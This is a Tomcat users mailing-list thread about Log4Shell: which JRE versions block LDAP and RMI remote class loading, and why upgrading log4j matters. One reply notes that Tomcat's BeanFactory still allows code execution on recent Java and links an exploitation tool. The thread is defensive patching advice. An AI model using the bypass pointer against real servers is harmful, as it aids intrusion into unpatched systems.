There have been multiple Patches for RMI and LDAP over time in Java. The first article states which attack (from the one the researcher analyzed) was possible in which version.
https://www.veracode.com/blog/research/exploiting-jndi-injections-java https://github.com/mbechler/marshalsec/ If the system is not explicitly configured to allow remote class loading via RMI from everywhere, the only successful attack (= run code on the server), I found, is leveraging the BeanFactory of Tomcat. The latter is working with any recent Tomcat and Java. I understand Mark’s point that this is caused by use of log4j and not by Tomcat on the other hand it would be way harder to leverage the attack, if the BeanFactory could be modified. > Am 13.12.2021 um 16:03 schrieb Juri Berlanda <juri.berla...@tuwien.ac.at>: > > Hi, > > we were affected - we use an AccessLogValve, which logs to Log4j2 and we use > Log4j as java.util.logging LogManager. We already patched, but only on > Saturday. > > In any case: in a lot of places I saw "recent JRE versions have a mitigation > in place", but I can't seem to find which JRE version introduced which > mitigation. Can anybody here point me to where I can find that information? > Googling for this only seems to bring up everybody's security advisories, but > nobody seems to bother to state exact JRE versions. > > Cheers, > > Juri > > On 12/13/21 2:13 PM, Christopher Schultz wrote: >> Tim, >> >> Adding to what others have posted... >> >> On 12/13/21 03:57, Scott,Tim wrote: >>> Suspecting that someone here knows the answer immediately, I thought I’d >>> ask. >>> >>> If you do not know the answer, please don’t spend any time investigating: >>> I’ll do that later today and update everyone whether or not I find an >>> answer. >>> >>> Our security team advise that “Certain versions of the Java Development Kit >>> remove the LDAP attack vector”. >>> >>> My question is: Does this removal occur during compile time or runtime? >> >> Runtime. You can even re-enable the vulnerability if you want :) >> >> It's worth repeating what David Weisgerber said in his reply: even if the >> runtime JDK/JRE provides a mitigation of sorts, you may still be vulnerable >> through other means (aka "JNDI gadgets"). >> >> There is also a risk of information leakage which does NOT rely on the use >> of LDAP connections. >> >> Your best course of action would be to upgrade log4j if possible, or use one >> of the several other mitigations available for recent versions. If you >> aren't running a recent version, RUN ONE. >> >> -chris >> >> --------------------------------------------------------------------- >> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org >> For additional commands, e-mail: users-h...@tomcat.apache.org > > --------------------------------------------------------------------- > To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org > For additional commands, e-mail: users-h...@tomcat.apache.org > --------------------------------------------------------------------- To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
